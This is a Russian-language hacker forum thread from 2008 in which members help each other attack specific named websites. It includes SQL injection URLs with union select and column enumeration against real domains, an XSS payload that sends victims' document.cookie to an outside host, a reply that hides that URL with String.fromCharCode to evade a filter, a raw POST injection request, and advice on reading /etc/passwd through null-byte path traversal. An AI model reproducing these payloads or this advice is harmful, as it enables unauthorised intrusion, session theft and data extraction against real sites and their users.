Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. gibson

    gibson Elder - Старейшина

    Joined:
    24 Feb 2006
    Messages:
    391
    Likes Received:
    247
    Reputations:
    88
    все правильно при таком запросе у тя будет
    void;pass -> login: void pass: pass
    0x3b -> разделитель ;
    больше записей в users нету поэтому пустой рез.
    Версия бд 4.1.18
    Ну нет доступа это обычное дело, правильно права выставлены.
     
  2. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Кто-то постарался знач : ) Пасип что разъяснил:Р
     
    #1622 Велемир, 10 Apr 2008
    Last edited: 10 Apr 2008
  3. Basurman

    Basurman Elder - Старейшина

    Joined:
    10 Nov 2006
    Messages:
    363
    Likes Received:
    271
    Reputations:
    29
    information_schema присутствует с версии 5 и далее
     
  4. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    В интернете мало доков по http? Скачай себе http intruder, там есть конструктор пакетов =\
     
    _________________________
  5. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Хыхы,а я и забыл ))))
     
  6. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    http://www.prstyle.ru/index.php?id=47+union+select+1,2,3,4/*

    По какой причине вылазит:
    ?
    Использование select имеет неправильный номер в колонке, как-то так..
     
  7. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25

    Мне живые примеры нуны для того, шоп убедиццо, шо я прально всё делаю. А запросы простенькие я могу составлять,и интрудер у меня есть ((((,
     
    1 person likes this.
  8. Basurman

    Basurman Elder - Старейшина

    Joined:
    10 Nov 2006
    Messages:
    363
    Likes Received:
    271
    Reputations:
    29
    Ershik, там 3 колонки
    http://www.prstyle.ru/index.php?id=47+order+by+4/*
    http://www.prstyle.ru/index.php?id=47+order+by+3/*
     
    2 people like this.
  9. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    Точно, три колонки и xss в поиске
    Спасибо, разобрался.
     
    1 person likes this.
  10. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    Всем прива ! У меня следующая проблема, проворачиваю активную ксс, код получился таким - <body onload=img = new Image(); img.src = "http://s.netsec.ru/xxx.gif?"+document.cookie;>
    Но символ / фильтруется, вернее даже не фильтруется, а все, что идет после него, обрубается, включая символ, можно ли что нибудь при таком раскладе сделать ?
     
    1 person likes this.
  11. d_x

    d_x Banned

    Joined:
    25 Mar 2008
    Messages:
    558
    Likes Received:
    650
    Reputations:
    210
    Можно строку "http://s.netsec.ru/xxx.gif?" зашифровать в ASCII-коды, а потом яваскриптом расшифровывать с помощью String.fromCharCode();
    Например:

    Code:
    String.fromCharCode(104,116,116,112,58,47, 47,115,46,110,101,116, 115,101,99,46,114,117,47, 120,120,120,46,103,105,102,63);
    //это вернёт строку http://s.netsec.ru/xxx.gif?
    А финальный вариант без ошибок примерно такой:
    Code:
    <body onload="javascript:img = new Image(); img.src = String.fromCharCode(104,116,116,112,58,47, 47,115,46,110,101,116, 115,101,99,46,114,117,47, 120,120,120,46,103,105,102,63);+document.cookie;">
    
     
    #1631 d_x, 10 Apr 2008
    Last edited: 10 Apr 2008
    2 people like this.
  12. ZET36

    ZET36 Elder - Старейшина

    Joined:
    8 Oct 2007
    Messages:
    250
    Likes Received:
    49
    Reputations:
    0
    пожайлусто помогите разработать sql иньекцию
    http://www.prodai.user.kz/index.php?id=68296&fid=5'
     
  13. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    "><script>alert()</script>

    Вопрос: Почему при передаче символов с двойными и одинарными кавычками не срабатывает ? А с передачей чисел пашет
     
  14. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    "><script>alert(/blablabla/)</script>

    кавычки не срабатывают изза magic_quotes или чегониб типа addslashes()
     
  15. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Больше на раскрытие пути похоже:Р
     
  16. freddi

    freddi Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    399
    Likes Received:
    243
    Reputations:
    145
    2 ZET36
    там нет sql иньекции, там только раскрытие пути.

    2 Велемир
    попробуй
    Code:
    "><script>alert(/text/)</script>
     
  17. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Нашёл инъекцию через POST :

    POST /oplok.php HTTP/1.0
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
    Host: www.site.com
    Content-Length: 66
    Cookie: PHPSESSID=a0e17714683f525e29aa6268ed85bf8b;hotlog= 1
    Connection: Close
    Pragma: no-cache

    id=%2D%31%2B%6F%72%64%65%72%2B%62%79%2B%35%30%30%3 0%30%30%30%2F%2A

    Передал запрос : -1+order+by+5000( тот,что выше).При передаче вместо 5000 еденицы или нуля выдаёт ту же ошибку -

    <b>Warning</b>: mysql_free_result(): supplied argument is not a valid MySQL result resource in <b>/home/wmkhark/public_html/oplok.php</b> on line <b>500</b><br />

    Не может же такого быть О_О )(

    Я знаю, про это где-то писали, лень мучить форум поиском:Р.

    Достал я вот файл etc/passwd.Пароль там не хранится,но есь какийто пути.Так же есь фаил etc/group. Не пойму,почему не работает etc/passwd%00.txt,но работает etc/passwd%00.jpg ? Они же не в этом формате Ж).Имея только эти файлы сделать что-то можно ?).Или какие-то другие пути нужны?

    Server banner Apache/2.2.3 (CentOS)
    Operating system Unix
    Web server Apache 2.x

    Из чувствительных директорий только /forum,/forum/css и т.д,но к ним нет доступа. папок типа админ и администратор нету.Йа ф шоке. Некуда даже инфу вводить)).

    Ну тык, умеет кто проводить sql inj через POST запросы ? Лично я в нете шарил - не нашёл ни одного гайда по этой теме.
     
    #1637 Велемир, 11 Apr 2008
    Last edited: 12 Apr 2008
  18. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    на том же сайте news.php?id=0+union+select+1,user(),3,4,5/*
     
    1 person likes this.
  19. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    Есть таблица "user_privileges", и как можно из этой таблцы вытащить всю информацию??
     
  20. S00pY

    S00pY Active Member

    Joined:
    24 Apr 2007
    Messages:
    91
    Likes Received:
    109
    Reputations:
    21
    мде..

    Посмотреть колумны в таблицеесли версия mysql 5,с помощью запроса:
    http://site.ru/index.php?id=1+union+select+1,2,3,column_name,5,6,....+from+information.schema.columns+where+table_name='user_privileges'
    Потом обычным запросом ужевыдирать данные!
    Но табла "user_privileges" ничем не интересна имхо!
     
Thread Status:
Not open for further replies.